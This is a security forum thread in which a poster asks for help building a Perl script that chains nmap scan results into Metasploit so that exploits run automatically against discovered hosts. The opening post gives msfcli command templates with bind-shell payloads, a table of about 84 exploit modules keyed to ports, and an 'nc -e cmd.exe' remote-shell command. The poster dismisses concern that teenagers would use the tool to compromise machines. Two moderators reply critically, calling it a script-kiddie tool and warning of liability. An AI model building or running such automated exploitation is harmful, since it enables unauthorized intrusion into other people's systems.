nmap and metasploit glue project
Results 1 to 5 of 5

Thread: nmap and metasploit glue project

  1. #1

    nmap and metasploit glue project

    This is an attempt to glue nmap and metasploit together, making metasploit work automatically getting informations from nmap.
    I can't handle it alone so any help would be much appreciated.
    What can you do?
    You can offer suggestions, write some code, find programs.
    Suggestions: I'm open for any suggestions so don't hesitate to speak your mind

    Write some code: You don't have to be a programming guru or familiar with perl to help out.
    What it bugs me the most I have to write very similar code many times.
    You can help me writing some msfcli arguments for the appropriate exploits.
    The exploit's name is in the %exploits hash, next to it you'll see a comment on what arguments are required.
    So you can write something like this:
    Code:
    my $msfarg = `./msfcli maxdb_webdbm_get_overflow RHOST=$ip TARGET=0 PAYLOAD=win32_bind E`;
    If you see in the comment 'target 0-2' for example write the code this way:
    Code:
    for(0..2) {
    	my $msfarg = `./msfcli trackercam_phparg_overflow RHOST=$ip TARGET=$_ PAYLOAD=win32_bind E`;
    }
    If there is just one argument for example 'target 0' or 'payload win32_bind' just do as it says
    Code:
    my $msfarg = `./msfcli arkeia_agent_access RHOST=$ip TARGET=0 E`;
    'RHOST' and 'E' are constants 'RHOST' always has value '$ip'. E is a msfcli argument which means exploit.
    See the comment next to the exploit what other arguments it requires.
    Fell free to ask me any question(s) (try to be very specific) either post here or e-mail me at ludakot[at]gmail.com (NO I WON'T TEACH YOU HOW TO HACK!@#*^%^#$)

    Find programs: You see all these exploits? Well I guess I'll need each and every one service they exploit.
    Don't just post a link of the developer's page like http://company.com Try to find the exact version(s) the exploit works on.
    You can find this out when you open msfconsole and write 'info NameOfTheExploit'. For example
    Code:
    msf > info apache_chunked_win32
    
          Name: Apache Win32 Chunked Encoding
         Class: remote
       Version: $Revision: 1.44 $
     Target OS: win32, win2000, winnt, win2003, winxp
      Keywords: apache
    Privileged: Yes
    Disclosure: Jun 19 2002
    
    Provided By:
        H D Moore <hdm [at] metasploit.com>
    
    Available Targets:
        Windows Generic Bruteforce
        Apache.org Build 1.3.9->1.3.19
        Apache.org Build 1.3.22/1.3.24
        Apache.org Build 1.3.19/1.3.24
        Apache.org Build 1.3.22
        Apache.org Build 1.3.17->1.3.24 (Windows 2000)
        Apache.org Build 1.3.17->1.3.24 (Windows NT 4.0)
    It would be awesome to find all these services in an appropriate version.
    So I can figure out ways how to recognize the service remotely, hence making this glue program faster and more reliable.
    So I'd like you to post or e-mail me direct download links, that will sure save me a lot of time and frustration.

    Nothing will go unnoticed, everything you have contributed will be credited accordantly.
    You can download metasploit from http://metasploit.com or http://metasploit.org
    I tried to add all remote exploits that don't need to listen for connections. Apparently I missed some.
    My 'grep' relayed on m/The\starget\sport\S\S\s(\d{1,5})/ But some exploits had something different in their info for example 'The samba port', 139'.
    If you feel like it, please post the rest NON LISTENING exploits with their name and default port so I can add them in the hash.
    Or perhaps if you'd like this program to use an exploit that isn't in the metasploit framework, post the exploit's code and I'll add it.

    The exploits
    Code:
    my %exploits = ( # 84 
    	"altn_webadmin" => 			"1000", # target 0-3, payload win32_bind	
    	"backupexec_agent" => 		"10000",# payload win32_bind 
    	"calicserv_getconfig" => 		"10202",# target 0, payload win32_bind
    	"calicclnt_getconfig" => 		"10203",# target 0, payload win32_bind
    	"seattlelab_mail_55" => 		"110",  # payload win32_bind 
    	"msrpc_dcom_ms03_026" => 		"135",  # payload win32_bind  
    	"ms05_039_pnp" => 			"139",  # target 0-6, payload win32_bind
    	"samba_nttrans" =>			"139",  # target 0, payload linux_ia32_bind
    	"samba_trans2open" =>		"139",  # target 0-1, payload 0 linux_ia32_bind, 1 bsd_ia32_bind
    	"samba_trans2open_osx" => 		"139",  # payload osx_ppc_bind
    	"samba_trans2open_solsparc" =>		"139",  # target 0-1, payload solaris_sparc_bind
    	"uow_imap4_lsub" => 			"143",  # target 0-5, payload 0,2,3 linux_ia32_bind, 1,4,5 bsd_ia32_bind
    	"eudora_imap" => 			"143",  # payload win32_bind
    	"gnu_mailutils_imap4d" => 		"143",  # payload linux_ia32_bind
    	"mailenable_imap" => 			"143",  # target 0, payload win32_bind
    	"mdaemon_imap_cram_md5" => 		"143",  # target 0, payload win32_bind
    	"uow_imap4_copy" => 			"143",  # target 0-4, payload 0,3 linux_ia32_bind, 1,2,4 bsd_ia32_bind 
    	"mssql2000_preauthentication" => 	"1433", # payload win32_bind 
    	"mssql2000_resolution" => 		"1434", # payload win32_bind
    	"zenworks_desktop_agent" =>	 	"1761", # payload win32_bind
    	"bakbone_netvault_heap" => 		"20031",# target 0-1, payload win32_bind
    	"wsftp_server_503_mkd" => 		"21",   # payload win32_bind, user anonymous, pass a@a 
    	"freeftpd_user" => 			"21",   # target 0-3, payload win32_bind 
    	"netterm_netftpd_user_overflow" => 	"21",   # payload win32_bind
    	"slimftpd_list_concat" => 		"21",   # payload win32_bind
    	"servu_mdtm_overflow" => 		"21",   # user anonymous, pass a@a, payload win32_bind
    	"warftpd_165_user" => 			"21",   # target 0-2, payload win32_bind 
    	"globalscapeftp_user_input" => 		"21",   # payload win32_bind
    	"3com_3cdaemon_ftp_overflow" => 	"21",   # target 0-2, payload win32_bind
    	"oracle9i_xdb_ftp" => 			"2100", # payload win32_bind, 
    	"oracle9i_xdb_ftp_pass" => 		"2100", # target 0, payload win32_bind 
    	"msmq_deleteobject_ms05_017" => 	"2103", # payload win32_bind, hname <STDIN>
    	"solaris_ttyprompt" => 			"23",   # payload cmd_interact
    	"wmailserver_smtp" => 			"25",   # target 0-2, payload win32_bind
    	"ypops_smtp" => 			"25",   # payload win32_bind 
    	"exchange2000_xexch50" => 		"25",   # payload win32_bind 
    	"openview_connectednodes_exec" => 	"3443", # payload cmd_irix_bind, dir <STDIN> 
    	"imail_ldap" => 			"389",  # target 0-1, payload win32_bind 
    	"cacam_logsecurity_win32" => 		"4105", # payload win32_bind
    	"cabrightstor_disco_servicepc" => 	"41523",# target 0, payload win32_bind 
    	"cabrightstor_disco" => 		"41524",# target 0, payload win32_bind 
    	"wins_ms04_045" => 			"42",   # target 0, payload win32_bind
    	"windows_ssl_pct" => 			"443",  # target 0-6, payload win32_bind
    	"kerio_auth" => 			"44334",# target 0-2, payload win32_bind
    	"sentinel_lm7_overflow" => 		"5093", # target 0-4, payload win32_bind
    	"cabrightstor_uniagent" => 		"6050", # payload win32_reverse_ord, lhost 127.0.0.1
    	"cabrightstor_sqlagent" => 		"6070", # target 0-8, payload win32_bind
    	"backupexec_ns" => 			"6101", # target 0-1, payload win32_bind,
    	"backupexec_registry" => 		"6106", # target 1,
    	"arkeia_agent_access" => 		"617",  # target 0, 
    	"arkeia_type77_macos" => 		"617",  # target 0, payload osx_ppc_bind, 
    	"arkeia_type77_win32" => 		"617",  # target 0-10, payload win32_bind, 
    	"futuresoft_tftpd" => 			"69",   # target 0-3, payload win32_bind, 
    	"ut2004_secure_linux" => 		"7787", # target 0, payload linux_ia32_bind, 
    	"ut2004_secure_win32" => 		"7787", # target 0, payload win32_bind, 
    	"iis_w3who_overflow" => 		"80",   # target 0-1, payload win32_bind, url <STDIN>
    	"iis_nsiislog_post" => 			"80",   # payload win32_bind
    	"php_vbulletin_template" => 		"80",   # payload cmd_irix_bind, rpath <STDIN>
    	"awstats_configdir_exec" => 		"80",   # payload cmd_irix_bind, dir <STDIN>
    	"minishare_get_overflow" => 		"80",   # target 0-8, payload win32_bind, 
    	"phpbb_highlight" => 			"80",   # payload cmd_irix_bind, phpbbroot <STDIN>
    	"rsa_iiswebagent_redirect" => 		"80",   # target 0-1, payload win32_bind, url <STDIN>
    	"iis50_printer_overflow" => 		"80",   # payload win32_bind 
    	"warftpd_165_pass" => 			"80",   # payload win32_bind
    	"bluecoat_winproxy" => 			"80",   # target 0, payload win32_bind
    	"apache_chunked_win32" => 		"80",   # target 0, payload win32_bind
    	"badblue_ext_overflow" => 		"80",   # payload win32_bind
    	"iis40_htr" => 				"80",   # target 0-2, payload win32_bind
    	"sambar6_search_results" => 		"80",   # target 0-1, payload win32_bind
    	"iis50_webdav_ntdll" => 		"80",   # payload win32_bind
    	"ia_webmail" => 			"80",   # payload win32_bind
    	"php_xmlrpc_eval" => 			"80",   # payload cmd_irix_bind, rpath <STDIN>
    	"lyris_attachment_mssql" => 		"80",   # payload cmd_generic, cmd nc -lnp 31337 -e cmd.exe\/bin/sh
    	"iis_source_dumper" => 			"80",   # target 0, rfile <STDIN>
    	"cacti_graphimage_exec" => 		"80",   # payload cmd_unix_reverse, dir <STDIN>, lhost 127.0.0.1
    	"iis_fp30reg_chunked" => 		"80",   # target 0-2, payload win32_bind
    	"php_wordpress_lastpost" => 		"80",   # payload cmd_irix_bind, rpath <STDIN>
    	"barracuda_img_exec" => 		"8000", # payload cmd_unix_reverse, lhost 127.0.0.1, img <STDIN>
    	"shoutcast_format_win32" => 		"8000", # target 0-3, payload win32_reverse_ord, lhost 127.0.0.1
    	"icecast_header" => 			"8000", # payload win32_bind	
    	"edirectory_imonitor" => 		"8008", # target 0, payload win32_bind
    	"mailenable_auth_header" => 		"8080", # target 0, payload win32_bind
    	"oracle9i_xdb_http" => 			"8080", # target 0, payload win32_bind
    	"trackercam_phparg_overflow" => 	"8090", # target 0-2, payload win32_bind
    	"maxdb_webdbm_get_overflow" => 		"9999", # target 0, payload win32_bind
    );
    Oh silly me, I'm sorry I should have posted this in Programming Security. My apologies.
    Share on Google+

  2. #2
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,883
    Let me be sure that I understand what I'm seeing here. You want to develop a mechanism that takes NMAP data and feeds it through metasploit in order to hammer vulnerabilities on target hosts?

    If this is the case, this sounds like the ultimate script-kiddie grinder tool. Point, click, fire. Rinse, spin, repeat.

    Have you considered the ramifications of such a tool?

    --Th13
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden
    Share on Google+

  3. #3
    Consequences? No not really I don't care actually I think it would be a useful tool, scanning your lost boxes on your network see if they are vulnerable in short period of time. Plus I tend to learn a lot more about remote fingerprinting. But in any case you're right that a lot of 16 year olds will scan around and 'own' a lot of computers, but hey that could contribute making the internet safer in an ironic way.
    Share on Google+

  4. #4
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,883
    One could argue that tools like Nessus do the same, however, they have a "safe scan" option and bill the product towards security professionals.

    Enabling skiddies tends to bend me the wrong way. A tool like you're proposing is extremely dangerous. If I were you, I'd be very careful on how you proceed. You may find yourself liable for its misuse.

    'own' a lot of computers, but hey that could contribute making the internet safer in an ironic way.
    How do you figure that kiddies owning boxes makes the internet safer? I'm really asking you, It's not a rhetoracal question or a snide comment.

    --Th13
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden
    Share on Google+

  5. #5
    Super Moderator
    Know-it-All Master Beaver

    Join Date
    Jan 2003
    Posts
    3,914
    Originally posted here by LudakoT
    Consequences? No not really I don't care actually I think it would be a useful tool, scanning your lost boxes on your network see if they are vulnerable in short period of time. Plus I tend to learn a lot more about remote fingerprinting. But in any case you're right that a lot of 16 year olds will scan around and 'own' a lot of computers, but hey that could contribute making the internet safer in an ironic way.
    Hey Hey,

    You think this would be beneficial for a network to find lost boxes?? So you're obviously talking about corporate/enterprise networks... And you don't care about the consequences.. This tells me a couple of things about you.

    1. You're not a security professional.
    2. You're definately not over the age of 20.
    3. You really have no idea how an Enterprise Environment works..
    4. I highly doubt you work in IT, even at a helpdesk level.

    Enterprises do not run intense scans that, not only hammer their boxes, but that could jeopardize them... You'd be out of a job if you randomly crashed boxes to knowthey exist. If you're finding lost boxes, the nmap scan alone will help you... it'll have found them or the addition of Metasploit won't really be useful because if nmap didn't find them... Metasploit won't..

    If you were truely into IT security and concerned you wouldn't be looking at a route like this. MSF is great.. but it's exploit tree is severely lacking still... in that aspect it's still a very immature product. It's handy at times and quite useful occasionally... but things like UT2004 and even Futuresoft TFTPD exploits are not what your average Admin is looking for.

    An Admin is going to want to know if they're up to date on their MS Patches... If their software is running the "Enterprise Standard", if their primary daemons and servers (IIS, Apache, Exchange, Sendmail, etc) are open to any horrid vulns or if updates are available for that software. They're going to want a product like the nCircle IP360. Which can do that and more...

    Peace,
    HT
    IT Blog: .:Computer Defense:.
    PnCHd (Pronounced Pinched): Acronym - Point 'n Click Hacked. As in: "That website was pinched" or "The skiddie pinched my computer because I forgot to patch".
    Share on Google+

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •